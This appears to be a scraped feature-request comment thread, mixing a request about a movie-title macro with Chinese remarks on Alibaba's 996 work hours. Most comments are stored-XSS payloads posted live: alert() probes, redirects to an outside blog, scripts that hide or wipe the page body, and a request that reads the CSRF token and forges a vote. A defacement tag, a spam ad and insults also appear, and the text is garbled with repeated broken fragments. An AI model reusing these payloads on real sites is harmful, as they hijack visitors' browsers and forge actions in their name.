If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>
yaozhewei commented 8 months ago
img,svg,table{visibility: collapse;}window.onload=function(){var commentBodySet = document.getElementsByClassName("body");for(var i=1;i
jarrettyu commented 8 months ago
怎么没有评论
| lovywinsy commented 8 months ago
什么都不说,才是最好的 ^
JimmyVV commented 8 months ago
:)
| formalin14 commented 8 months ago
默默转发
| xxxwei commented 8 months ago
阿里太忙了,点个赞就走,没时间评论。
Jeffery-Song commented 8 months ago
不同部门不一样吧,之前实习所在部门一般995,周五晚上随意,平时晚上去锻炼什么的也都没问题
FEI17N commented 8 months ago
阿里2c部门是996
| netsman1030 commented 8 months ago
这个应该是个外包提上去的,阿里对外包是真的狠
| Tarry2012 commented 8 months ago
阿里既压榨还洗脑。
| ostopuro commented 8 months ago
| ostopuro commented 8 months ago
反996工作机会介绍群
xx19941215 commented 8 months ago
alert("老哥有xss漏洞哦 修复下")
z231485 commented 8 months ago
alert("我也来注入下试试")
imgss commented 8 months ago
alert("我也来注入下试试")
| wubocong commented 8 months ago
alert('hhh')
jvjs commented 8 months ago
alert("你们把我带坏了")
why66ccff commented 8 months ago
alert("你们别太过分了")
sunrui849 commented 8 months ago
alert("哈哈哈哈哈哈哈哈哈")
d9823 commented 8 months ago
alert("是这样玩的么?")
Lleksi commented 8 months ago
">alert("test")
Lleksi commented 8 months ago
alert("test")
d9823 commented 8 months ago
alert("试试")
d9823 commented 8 months ago
alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")
JohnHuahuaZhan commented 8 months ago
一群傻逼在那里注入,提示有漏洞就行了,注入你妈呢
intrhuting commented 8 months ago
美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy
abc1310054026 commented 8 months ago
@xx19941215: alert("老哥有xss漏洞哦 修复下") @z231485 : alert("我也来注入下试试") @imgss : alert("我也来注入下试试") @wubocong: alert('hhh') @jvjs : alert("你们把我带坏了") @why66ccff: alert("你们别太过分了") @sunrui849: alert("哈哈哈哈哈哈哈哈哈") @Lleksi : alert("test") alert("test") @d9823 : alert("试试") alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")
666sbX commented 8 months ago
Hacked By Helen收徒QQ925999918
ByMYX commented 8 months ago
alert("长的像个pig昂,还把自己的照片附上去 有病呀!")
ByMYX commented 8 months ago
@xx19941215:alert("长的像个pig昂,还把自己的照片附上去 有病呀!")
ByMYX commented 8 months ago
window.alert = function() { return false; }
ByMYX commented 8 months ago
<!-- window.alert = function(str){ return ; } alert("不能弹出警示框");//-->
sadtrain commented 8 months ago
就这素质还收徒,一个好好的项目被一小部分人玩坏了
sadtrain commented 8 months ago
var picTableBody = document.querySelector('body > div.container > div > div.col-md-9.col-sm-12 > div.comments > div:nth-child(28) > div.media-body > div > div') picTableBody.removeChild(picTableBody.firstChild)
JamesChenX commented 8 months ago
document.body.innerText = '';
LinXueyuanStdio commented 8 months ago Admin
table{visibility: collapse;}
reinit commented 8 months ago
Please report XSS vulnerability
var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();
reinit commented 8 months ago
Please report XSS vulnerability https://feathub.com/feathub/feathub/+65
var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
xss67612 commented 8 months ago
document.body.innerText = '';
superzmy commented 8 months ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
| doujinlong1 commented 8 months ago
"/>alert("学习xss注入")<!-
jarrettyu commented 8 months ago
注入是真的烦
| cmlanche commented 8 months ago
禁用js就好了啊
| cmlanche commented 8 months ago
阿里是加班最严重的公司
tancky commented 8 months ago
alert('友情提醒:看到此消息请禁用浏览器javascript功能');
| sueking commented 8 months ago
"/>alert('alibaba')<!--
Presley-Z commented 8 months ago
alert("双锅牛逼")
Presley-Z commented 8 months ago
confirm("双锅牛逼")
| zzxcvbnm19 commented 8 months ago
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>
| zzxcvbnm19 commented 8 months ago
sadsa
| microhz commented 8 months ago
alert("博主赶紧把布丁打上,大家别起哄了!都是吃口技术饭!积极建立黑名单机制!")
guotao commented 8 months ago
If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
guotao commented 8 months ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
kainy commented 8 months ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
guotao commented 8 months ago
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
guotao commented 8 months ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>